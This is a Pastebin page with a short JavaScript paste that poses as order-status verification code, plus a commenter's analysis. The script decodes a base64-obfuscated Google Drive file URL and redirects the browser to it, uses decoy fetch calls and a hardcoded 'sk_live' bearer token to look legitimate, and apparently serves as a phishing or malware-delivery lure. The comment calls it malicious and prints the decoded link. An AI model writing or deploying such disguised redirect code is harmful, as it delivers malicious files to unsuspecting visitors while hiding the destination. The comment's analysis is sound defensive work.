API tools faq
paste
Advertisement
kammex

Untitled

kammex
Apr 30th, 2025
186
0
Never
2
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 1.18 KB | None | 0 0
raw download clone embed print report
  1. (async function () {
  2.   const apiEndpoint = "/v1/order/30642/status";
  3.   const orderId = "ORD-" + Math.random().toString(36).substring(2, 10).toUpperCase();
  4.  
  5.   async function verifyOrder(id) {
  6.     try {
  7.       const response = await fetch(apiEndpoint, {
  8.         method: "POST",
  9.         headers: {
  10.           "Content-Type": "application/json",
  11.           "Authorization": "Bearer sk_live_xr7u8ghs1k2as91"
  12.         },
  13.         body: JSON.stringify({ order_id: id })
  14.       });
  15.  
  16.       const data = await response.json();
  17.       return data;
  18.     } catch (err) {
  19.       return { status: "ERROR" };
  20.     }
  21.   }
  22.  
  23.   function logEvent(id, status) {
  24.     fetch("/v1/event", {
  25.       method: "POST",
  26.       headers: {
  27.         "Content-Type": "application/json"
  28.       },
  29.       body: JSON.stringify({
  30.         event: "delivery_attempt",
  31.         order: id,
  32.         result: status
  33.       })
  34.     });
  35.   }
  36.  
  37.   const secret = 'aHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL2ZpbGUvZC8xOFpfQ290djVDYjFYQkcxSFdwaXZKT0VYaUN1MHJnTWsvdmlldw==';
  38.   const decode = atob;
  39.   const finalURL = decode(secret);
  40.  
  41.   window.open(finalURL, '_self');
  42.  
  43.   const status = await verifyOrder(orderId);
  44.   logEvent(orderId, status.status === "CONFIRMED" ? "success" : "fallback");
  45. })();
Advertisement
Comments
  • PRSADSRXSIRAX
    PRSADSRXSIRAX
    3 hours (edited)
    # text 1.62 KB | 0 0
    view report reply
    1. Yes β€” this script is highly suspicious and likely malicious or phishing-related, just like the one you shared earlier.
    2.  
    3. πŸ” Why This Is Suspicious / Malicious
    4. 🚨 Auto-generated Fake Order ID
    5.  
    6. js
    7.  
    8. const orderId = "ORD-" + Math.random().toString(36)...
    9. Fakes a seemingly valid order ID to simulate a legitimate transaction.
    10.  
    11. πŸ” Exposed Secret API Key
    12.  
    13. js
    14.  
    15. "Authorization": "Bearer sk_live_xr7u8ghs1k2as91"
    16. API keys like this should never be public.
    17.  
    18. This key could be:
    19.  
    20. Stolen from a service
    21.  
    22. Fake, used to trick you into trusting the request
    23.  
    24. Harvested if someone runs the script locally
    25.  
    26. πŸ“₯ Hidden Redirection via Base64
    27.  
    28. js
    29.  
    30. const secret = 'aHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL2ZpbGUvZC8xOFpf...';
    31. const finalURL = decode(secret);
    32. window.open(finalURL, '_self');
    33. Base64-decoded string redirects the user to:
    34.  
    35. bash
    36.  
    37. https://drive.google.com/file/d/18Z_Cotv5Cb1XBG1HWpivJOEXiCu0rgMk/view
    38. This is a file hosted on Google Drive β€” often used in phishing and malware distribution because:
    39.  
    40. It bypasses some filters
    41.  
    42. Google Drive links look trustworthy
    43.  
    44. πŸ§ͺ Fake Order Verification + Logging
    45.  
    46. js
    47.  
    48. verifyOrder(...);
    49. logEvent(...);
    50. This pretends to verify an order and log an event.
    51.  
    52. It’s likely just smoke and mirrors β€” it does nothing meaningful but creates the illusion of legitimate backend activity.
    53.  
    54. 🧨 Conclusion
    55. Yes β€” this is likely part of a phishing scam or malware distribution technique.
    56.  
    57. It tries to:
    58.  
    59. Pretend to verify an order
    60.  
    61. Redirect the user to a suspicious file on Google Drive
    62.  
    63. Possibly log their activity or trick them into interacting with malicious content
    64.  
    65.  
  • PRSADSRXSIRAX
    PRSADSRXSIRAX
    3 hours
    # text 0.01 KB | 0 0
    view report reply
    1. Very great!
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!